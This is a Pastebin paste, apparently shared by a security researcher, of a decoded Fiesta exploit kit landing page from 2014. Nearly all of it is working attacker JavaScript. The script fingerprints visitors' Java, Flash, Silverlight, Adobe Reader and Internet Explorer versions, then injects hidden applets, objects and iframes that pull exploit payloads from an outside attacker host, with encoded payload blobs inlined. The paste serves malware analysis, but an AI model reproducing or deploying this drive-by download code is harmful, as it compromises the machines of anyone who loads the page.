Advertisement
tehsyntx

Fiesta exploit kit landingpage 2014-07-09 - Decoded

Jul 19th, 2014
4,476
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #####
  2. Decoded Fiesta exploit kit landingpage
  3. @tehsyntx
  4. thembits.blogspot.se
  5. #####
  6.  
  7. <html>
  8.  
  9. <head>
  10.     <title>page</title>
  11. </head>
  12.  
  13. <body>
  14.     <script>
  15.  
  16.         function loom7t(jq, toa) {
  17.             return jq.test(toa)
  18.         }
  19.  
  20.         function puisw() {
  21.             var hr;
  22.             hr = window.navigator.userAgent;
  23.             return loom7t(/x64;/i, hr) || loom7t(/Win64;/i, hr)
  24.         }
  25.  
  26.         function gantz(trq) {
  27.             return typeof trq != 'undefined'
  28.         }
  29.  
  30.         function idol6c(k0) {
  31.             var sux;
  32.             sux = window.document.createElement('div');
  33.             window.document.body.appendChild(sux);
  34.             sux.innerHTML = k0
  35.         }
  36.  
  37.         function rinkhb(jc) {
  38.             var bw58;
  39.             bw58 = window.document.createElement('iframe');
  40.             bw58.frameBorder = '0';
  41.             bw58.width = 10;
  42.             bw58.height = 10;
  43.             bw58.src = jc;
  44.             window.document.body.appendChild(bw58);
  45.             return bw58
  46.         }
  47.  
  48.         function bongr() {
  49.             if (loom7t((/Trident\/(\d)/i), window.navigator.userAgent)) {
  50.                 return parseInt(RegExp.$1)
  51.             } else {
  52.                 return 0
  53.             }
  54.         }
  55.  
  56.         function goshos(vu, ag, cm) {
  57.             return vu.replace(ag, cm)
  58.         }
  59.  
  60.         function wiryc3(wd) {
  61.             return (typeof wd == 'string' && loom7t(/\d/, wd))
  62.         }
  63.  
  64.         function tachjt(yd) {
  65.             var ml, af;
  66.             ml = wiryc3(yd) ? /[\d][\d\.\_,-]*/ .exec(yd) : null;
  67.             af = /[\.\_,-]/g;
  68.             return ml ? ml[0].replace(af, ',') : null
  69.         }
  70.  
  71.         function gayse(ckl, z3t) {
  72.             var nx, ve, y1r;
  73.  
  74.             y1r = ['0', '0', '0', '0'];
  75.             ve = tachjt(ckl.replace(/\s/g, '')).split(',');
  76.             for (nx = 0; nx < ve.length; nx++) {
  77.                 if (!loom7t(/\d/, ve[nx])) {
  78.                     ve[nx] = '0'
  79.                 }
  80.             }
  81.             return ve.concat(y1r).slice(0, z3t)
  82.         }
  83.  
  84.         function jude8(kqq, t9, ad3) {
  85.  
  86.             while (kqq.length < t9) {
  87.                 kqq = ad3 ? '0' + kqq : kqq + '0'
  88.             }
  89.             return kqq
  90.         }
  91.  
  92.         function burn1y(f2) {
  93.             var mq, inb;
  94.  
  95.             mq = 0;
  96.             while (mq < f2.length) {
  97.                 try {
  98.                     inb = new ActiveXObject(f2[mq]);
  99.                     if (inb) {
  100.                         return inb
  101.                     }
  102.                 } catch (exc) {}
  103.                 mq++
  104.             }
  105.             return null
  106.         }
  107.  
  108.         function mist5() {
  109.             return gantz(window.ActiveXObject)
  110.         }
  111.  
  112.         function stancf() {
  113.             var wyl, efy, ew7, df, juf, epoy, ed0o;
  114.  
  115.             try {
  116.                 juf = null;
  117.                 efy = ['clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA', 'clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA'];
  118.                 for (epoy = 0; epoy < efy.length; epoy++) {
  119.                     ed0o = window.document.createElement('object');
  120.                     ed0o.setAttribute('classid', efy[epoy]);
  121.                     if (gantz(ed0o.jvms)) {
  122.                         juf = ed0o.jvms;
  123.                         break
  124.                     }
  125.                 }
  126.                 if (juf != null && juf.getLength() != 0) {
  127.                     wyl = 0;
  128.                     for (epoy = 0; epoy < juf.getLength(); epoy++) {
  129.                         ew7 = gayse(juf.get(epoy).version, 4);
  130.                         df = parseInt(ew7[1].concat(jude8(ew7[3], 2, true)), 10);
  131.                         if (df > wyl) {
  132.                             wyl = df
  133.                         }
  134.                     }
  135.                     return wyl
  136.                 }
  137.             } catch (exc) {}
  138.             return null
  139.         }
  140.        
  141.         song1w = stancf(); //Check Java version
  142.  
  143.         function weftlo() {
  144.             var q;
  145.             if (window.navigator.javaEnabled()) {
  146.                 if ((song1w && song1w > 458 && song1w < 722) || (!song1w && window.navigator.javaEnabled())) {
  147.                     q = "<applet width=10 height=10><param name='trod' value='http://gpoison.in.ua/d9gj8h5/50512c02f4cd99905648500a005802000208010a060100090003575556560405;1;3@@'/><param name='jnlp_href' value='http://gpoison.in.ua/d9gj8h5/0929524ae53676ff5a575e0207090653070106020150045a050a505d51070056'/></applet>";
  148.                     if (song1w && song1w >= 710) {
  149.                         q = goshos(q, '</applet>', "<param name='javafx_version' value='2.0+'/></applet>")
  150.                     }
  151.                     idol6c(q)
  152.                 }
  153.             }
  154.             return
  155.         }
  156.        
  157.         weftlo(); //Load Java exploit
  158.  
  159.         function cookj() {
  160.             var t9, zv;
  161.             if ((song1w && song1w < 631) || (!song1w && window.navigator.javaEnabled())) {
  162.                 zv = 'aced0005757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c020000787000000002757200095b4c746f616462713bfe2c941188b6e5ff02000078700000000170737200306a6176612e7574696c2e636f6e63757272656e742e61746f6d69632e41746f6d69635265666572656e63654172726179a9d2dea1be65600c0200015b000561727261797400135b4c6a6176612f6c616e672f4f626a6563743b787071007e0003';
  163.                 t9 = "<applet archive='http://gpoison.in.ua/d9gj8h5/6098c8929c7856505742580351030b0001080d03575a090903035b5c070d0d05' code='cutsxw' width=10 height=10><param name='dens' value='http://gpoison.in.ua/d9gj8h5/666d1bbbf4cd9990554e535f03595050010e025f050052590305540055575655;1;2@@'/><param name='puff' value='x_egX'/></applet>";
  164.                 t9 = goshos(t9, 'x_egX', zv);
  165.                 idol6c(t9)
  166.             }
  167.             return
  168.         }
  169.        
  170.         cookj(); //Load Java exploit
  171.  
  172.         function sawsl() {
  173.             var jc5, wrc, y;
  174.  
  175.             try {
  176.                 if (bongr() == 7 || mist5()) {
  177.                     jc5 = burn1y('ShockwaveFlash.ShockwaveFlash');
  178.                     if (jc5) {
  179.                         y = gayse(jc5.GetVariable('$version'), 4);
  180.                         wrc = jude8(y.slice(0, 3).join(''), 6, false);
  181.                         return [wrc, y[3]]
  182.                     }
  183.                 }
  184.             } catch (exc) {}
  185.             return null
  186.         }
  187.         mustz = sawsl(); //Check Flash version
  188.  
  189.         function grayh() {
  190.             var irz, pt7, ssq, lhi, ft;
  191.             pt7 = 155212;
  192.             pt7 -= 45212;
  193.             ft = 129925;
  194.             ft -= 9925;
  195.             if (mustz != null && mustz[0] >= pt7 && mustz[0] <= ft && (mustz[0] != ft || mustz[1] < 43)) {
  196.                 ssq = 'http://gpoison.in.ua/d9gj8h5/1a76467ec4de90654216510d060d05570659030d0054075e0452555250030352';
  197.                 ssq = [ssq, mustz[0], mustz[1]].join(';');
  198.                 lhi = "<object width=10 height=10 id='swf_id' type='application/x-shockwave-flash'><param name='movie' value='UAodS'/><param name='allowScriptAccess' value='always'/><param name='FlashVars' value='kidsl=CJHhj'/><param name='Play' value='0'/></object>";
  199.                 lhi = goshos(lhi, 'CJHhj', 'D3Ixoj9OWOXFiHqsKm343y_pTB1lL6n1PQLCGcZw1ew2FTx1j-vMzRTb628HlqjUD42gK3Kt5y6e3IytchqIaOYilQ1lJ6GzWWKFyT-_Tcg-uju6V-kh2-vQNWI0sibgHozhnWygcWjTwbneLG-fogW-fXS8rENwZL0i5ZtrIQOKImQbeKVEgPbK4Y6FrWyQi2HwSngn0OJm4KhRlUAeLSBsP722D0Bf4Fw_0PilOPqBZ5t5B5m0F4D5BsCSd8GF_yWGFsgZiOR9UH4IORBx06VAaf04QxB4RbMURrAzDDVrCSk1pS0e3CFepHVRyFi2JOnFJKy09Tl0ouZUYstSwOsoQcNQj2FjPfcBsnRrMoGHSMi8okF3PX7uuOiPGjWPryOcNsXgx8qZiXENElV_j4GycYQFuf1722B3tfSrSKjOuKA0kx04-L6rvPfybvWIbU6PZ_LKbSWHL-7VQgtP76Y7XjW3esEHXdBpDvXkbDIpqES2TlC1MykmrWBgcPGvcg6N9UwMrO0FFhebAhw4eZZ3Ry6erQAG92A4ASmUc03_Bqa0_WI6DKlxvAvdJcID7DHdcLZ63Mr-f7pHHBULIZCRJKlmgZ8kLOh3o_loxoRXYAxuc_6jescj1K2cTTvqlhmup6OCkeu--tSRxofNY7P4Zx_bE18o4OxUh-2Ogz3jyW3iZqejXINrGdcyk-E16zN2lfcZscitMIrSQmTEsfrxY_8PIT4Qz67C5rA2aXUjm86Zhu553hSVaqeJwBz4qRCPDxKtL1TaczScMMz4xfMBhQzY3ZGYPCY-cg3R1B6YBCUiTyBqN9ZDZnG8eUVnj4VGH1TA91ScoDRGpZdGcrgObPJFTiSt26tJSORn_q0jaa-X46_uQwz56uDtVdhycXRM3l04urvHgUWXh2LUuViUsVidtVihs9YLvCapacJdM0ums0ums-Gl1p-Sx6N-H92evHUowXJUdDp94LklN7eUUhfBxOTpZT5wBIawTcAYmZaARK0FRAKGkoQwd6flkh5onaQxv6xGs7xG0wxGgjCp4pCxqcOpBM3wCou_UqZEbOZqZou2GVrRAww5qlmkFB6N2_QoVDMDcuTvAc87pRhBYADbtmRHaim505gPmm8RPzlV3kgLjSTIN3nt_Xdew_nidYmaN_qcbg13f7nh_btrtj383BGsIK-jm6LQvt-2WzyEdORZ3Lt8cgdBkHgylY4aU2hU9hB-c0B1_ACV9rU-iLZVEcUntsUlIsz-7Q1Amsg01WdfF-uvkaiOaBsOsRiHKzNOnroO8Jv-2COvYCL6YCSfYCdfX6LXzW7ToiyRa87RDPrfkwhldPRONE4jt6t7ywX_SKTL8HW1ydOx6uJMAd_5NuRduHmaRIuZ8ZgHtZvLTw1KP2frT74rFg57qzF92Mms3Y2zhDd4Dczo48SPPL4L_lxsCrND61nPMPSGlvMY5xyDvQ7Uy1JBL9G-OgObYDA03gA0D7CwJwkdOyGwawx28jjz6OG28AmiOEwA4Dn9w9g-7kjHyXjTq-PSObN-ObfoYOfE3YiurjfR0lF7oFQIBFFqBhFqBijLBVTRD5wUACwnEXNcIXuxLai3nbeaRNwfIAtFx9zesJLQ3Cl6-PInZaHDuU4lnkNPqV_TcLwrdQvPDFIa9nfzkLIzeA5_7uVjpkaqnGc3MEimmCY7vgzI4-dJTOsDADjEwKwbP2CM9pFZfZZabLdTPPaBfvLF1M6CARLhhsrMUmlwV0i_Kb8NKb8NJM2lmJZ5owUgFvng9Ing57Tg57d4cpR8urTosifZK-io1yfS6vX4YVN4BvFL1jFCaVvLMRUCYPRGSmR7VCRHRewgdCGoXMwueaGY3YiS31i4rYf4_QX_0NF0_Qvq02PLDCOeoCx5eUN0YEvuIg');
  200.                 lhi = goshos(lhi, 'UAodS', ssq);
  201.                 idol6c(lhi)
  202.             }
  203.         }
  204.         grayh(); //Load Flash exploit
  205.  
  206.         function pigs5(a7j) {
  207.             return (a7j < 10 ? '0' : '') + a7j.toString()
  208.         }
  209.  
  210.         function malao(br) {
  211.             return (br[0] + '.' + br[1] + '.' + br[2] + pigs5(br[3]) + pigs5(br[4]))
  212.         }
  213.  
  214.         function rasee(tzb, bry, sk, cv) {
  215.             var m6c;
  216.             m6c = bry.slice(0);
  217.             m6c[sk] = cv;
  218.             return gauli(tzb, m6c)
  219.         }
  220.  
  221.         function gauli(i3, xw) {
  222.             var auj, cxq, sv8;
  223.             try {
  224.                 return i3.IsVersionSupported(malao(xw))
  225.             } catch (exc) {}
  226.             return false
  227.         }
  228.  
  229.         function inchvv() {
  230.             var t1, hrv, x9, rt0, pj, dam, yd, w5;
  231.            
  232.             yd = null;
  233.             hrv = null;
  234.             try {
  235.                 if (bongr() == 7 && (yd = window.navigator.plugins['Silverlight Plug-In'])) {
  236.                     hrv = yd.description;
  237.                 } else if (bongr() == 7 || mist5()) {
  238.                     x9 = burn1y('AgControl.AgControl');
  239.                     rt0 = 0;
  240.                     t1 = [1, 0, 1, 1, 1];
  241.                     pj = [6, 2, 9, 12, 31];
  242.                     if (x9 && gauli(x9, t1)) {
  243.                         for (w5 = 0; w5 < pj.length; w5++) {
  244.                             for (dam = t1[w5] + (w5 == 0 ? 0 : 1); dam <= pj[w5]; dam++) {
  245.                                 if (!rasee(x9, t1, w5, dam)) {
  246.                                     break
  247.                                 }
  248.                                 rt0++;
  249.                                 t1[w5] = dam
  250.                             }
  251.                         }
  252.                         if (rt0) {
  253.                             hrv = malao(t1)
  254.                         }
  255.                     }
  256.                 }
  257.                 if (hrv) {
  258.                     return gayse(hrv, 3).join('')
  259.                 }
  260.             } catch (exc) {}
  261.             return null
  262.         }
  263.         cups7 = inchvv(); // Check Silverlight version
  264.  
  265.         function bonoa() {
  266.             var l8z, cj, , bn, o7n;
  267.  
  268.             l8z = 4243834;
  269.             l8z += 876291;
  270.             bn = 2648393;
  271.             bn += 1402008;
  272.             if (cups7 >= bn && cups7 < l8z) {
  273.                 cj = 'http://gpoison.in.ua/d9gj8h5/5fdb77861a072673460a1259050c0a04025e50590355080d0055060653020c01';
  274.                 cj = [cj, cups7].join(';');
  275.                 o7n = "<object data='data:application/x-silverlight-2,' type='application/x-silverlight-2' width=10 height=10><param name='source' value='yqobs'/><param name='initParams' value='gael=YOsTWLlxBQAASYA0CBeFyXX3/9Bhw+jo/////psTFxdJnuSaRL+uSWasR69ld2BjRf+TFBcX657guob0A/+RFBcXhbqG9OWex/+4FBcXvPzlrq5kJsCvY3ajF30X/08UFxf/KRQXF4DoRAMrEWUjR0N9H33o6EQvTYb0MEdDfxcHFxdAfQ5F6EQrhk/0ApwQGKFfFl6aU58fnB+X6jdkFOlUuf9jFRcXhvRlJte7ktdjQkdA6ERXQUBA6ERTTxbR/+8WFxeG9EJ9HE9fY1hHl2y5FmMG/64WFxeS12I06ARxKvMVYvOXbPoXYhpA/yQXFxeS12Ic6VT6/wQWFxeG9N5PuhbR/LOAmmRvQbsuKWLs0BEsJhcXSf/oFhcX1H0XfenoRBNBQEKe8q5MgzyD/4MVFxeG9GlGmkSPRehEI5LXY2WcRyue0Z7QFJMHlxcXF5wf9Hd3FGcbJteO7v/BFRcXYu+W7UlmrEd2YxKU1wP8yOhnBxbZJt5eVrqS12MiQZpjEBUm147v/70VFxdi75btQGPX40li9kkW6ZwjmU6cRiucUwYLFFsGOxbfLtllEy7RYR8m195ISdUTF0GcYgdBupLXYuyQ4EmaRIlFQehER4b090ZGRuhEW07RFhdHQUDoRFNP0RdLQEBBkOm6ktdi7H1oQehEJ5orEZpUuEdA6EQbfRdB6ELrlO8IYL/8s0FAQp7ynum6ktdi7EFAmmz5kOm7cbyT12LummjpQOhEO0DoRF9JfStOPtue8EZAJtfkvUiYEH1kf3kXdhd/ZRdiF55wG654giYHr7gHHL//QhYXF55QH31yf3IXbxd/cxc5F390F3oXnnAHnmADrrwzwMCvYfb40UD/PBYXF95ISdRAQp7yfUNOPtue7Z7wQCbX5L1ImlgHfVOYFkBGR0dHR0dHR0XoRD/eSNRAQSbXR0d9Fkd9FH0UQOhED1djDl+Aun0XQ0dBQOhEC5LXYx5A6EQ3QOhEM1dJSNRBRJ7pJteO6dE+xhbAQEYmzI7p1J0TCRfVkRMBnxMJFRMBnRMRJRC99f9OSExJ1EIm3kae9UZGRUFGrsqbtgCvuinG1v+TFxcXSpLXYnGS6GNznFIXfRdAQuhHJ5LXYkOcUB+S12NaR0NH/14XFxeBQUKcUhfoRxtOktdiILqFuibHKlFEQ0diPLomxy7fYjO6JsdHkOCU/gf/dejo6EZAfRfoRB9OLt9iHeghQehEO5Dg/BUm10rUrhcHFxeS12IVnt99V0ZHfRfoRAfUR/8fFxcXTv8gFxcX6PdAQUQm6HOcaCecaBucaAOe7CbXjpwoLuxjAJxgP5LhY+fu/14XFxe7YuAu3ZxQB2L3TElI1HecRyue1J7RRxRTB28m+lJ3FE83FCO8JteO7/8MFxcXYu8u3XZi/xRPMxigO3wUZwtPFBO5nlMzC3bUu2QRK3ZlFTs31t0aFtWT19R/e355fBdLF1sXeBdgFxcXYmV7enh5F0t0enM5cm9yHks5OUt5eGNyZ3ZzOXJvcjc4dDd0eGduNzhONzUyRDU3NTJENTcxMTdkY3ZlYzc1NTc1MkQ1Fzh0N2RjdmVjNzU1Nxf/eOzo6LF8gsjCvCaUbP3Wa6+YGWKOrOH3FxcXF0lmrEdpmrNF22kZHBf3zKpEV+jfi6jeOftoz6iIolfjzUuZRzzQGtlld2BjFxcXF0gfrkzi320vzMnBZRcXFxdATFx0CYJ8kHjrIDOe26rfCAeE/P13kKwXFxcXFxcXF39jY2ctODhwZ3h+ZHh5OX55OWJ2OHMucH0vfyI4JS8kdiF0LyckcXQhdiEkISImIy8iLyJ2JyMiLyd2JyUnIicnJyAidiclJyYnLyd1JyAndSImJyIiJSIhJ3QnICwiFxcXFw=='/></object>";
  276.                 o7n = goshos(o7n, 'yqobs', cj);
  277.                 idol6c(o7n)
  278.             }
  279.         }
  280.         bonoa(); // Load Silverlight exploit
  281.  
  282.        
  283.         function bins7() { // If IE 4-6 and not x64
  284.             var lgb, ps, gb;
  285.             lgb = bongr();
  286.             if (!puisw() && (lgb == 6 || lgb == 5 || lgb == 4)) {
  287.                 gb = 'http://gpoison.in.ua/d9gj8h5/5be2605ccb74a5cc5c070909040b0751025a5109025205580051075652050154';
  288.                 rinkhb(gb)
  289.             }
  290.             return
  291.         }
  292.         bins7(); //Load IE exploit
  293.  
  294.         function snagng() {
  295.             var cu, x6, xj2z, tkx, jb3, ht0, xaw;
  296.  
  297.             try {
  298.                 xj2z = null;
  299.                 tkx = (bongr() == 7 || mist5()) ? burn1y(['AcroPDF.PDF', 'PDF.PdfCtrl']) : null;
  300.                 x6 = window.document.createElement('object');
  301.                 x6.setAttribute('classid', 'clsid:CA8A9780-280D-11CF-A24D-444553540000');
  302.                 x6.setAttribute('src', '');
  303.                 try {
  304.                     xj2z = (tkx || x6).GetVersions()
  305.                 } catch (exc) {}
  306.                 if (xj2z) {
  307.                     xaw = xj2z.match(/=\s*[\d\.]+/g);
  308.                     ht0 = 0;
  309.                     for (jb3 = 0; jb3 < xaw.length; jb3++) {
  310.                         cu = parseInt(gayse(xaw[jb3], 3).join(''), 10);
  311.                         if (cu > ht0) {
  312.                             ht0 = cu
  313.                         }
  314.                     }
  315.                     return ht0
  316.                 }
  317.             } catch (exc) {}
  318.             return null
  319.         }
  320.         byesw = snagng(); //Check Adobe Reader/Acrobat version
  321.  
  322.         function koch96() {
  323.             var fb, sc, vp4;
  324.  
  325.             vp4 = bongr();
  326.             if (vp4 == 4 || vp4 == 5) {
  327.                 if ((byesw >= 800 && byesw < 821) || (byesw >= 900 && byesw < 931)) {
  328.                     sc = 'http://gpoison.in.ua/d9gj8h5/640195d4e800c0815a5d520a0b0e5606010c040a0d57540f030752555d005003';
  329.                     sc = [sc, byesw].join(';');
  330.                     fb = "<object classid='clsid:CA8A9780-280D-11CF-A24D-444553540000' width=10 height=10><param name='src' value='giExL'/></object>";
  331.                     fb = goshos(fb, 'giExL', sc);
  332.                     idol6c(fb)
  333.                 }
  334.             }
  335.             return
  336.         }
  337.         koch96(); //Load Adode Reader/Acrobat exploit
  338.        
  339.     </script>
  340. </body>
  341.  
  342. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement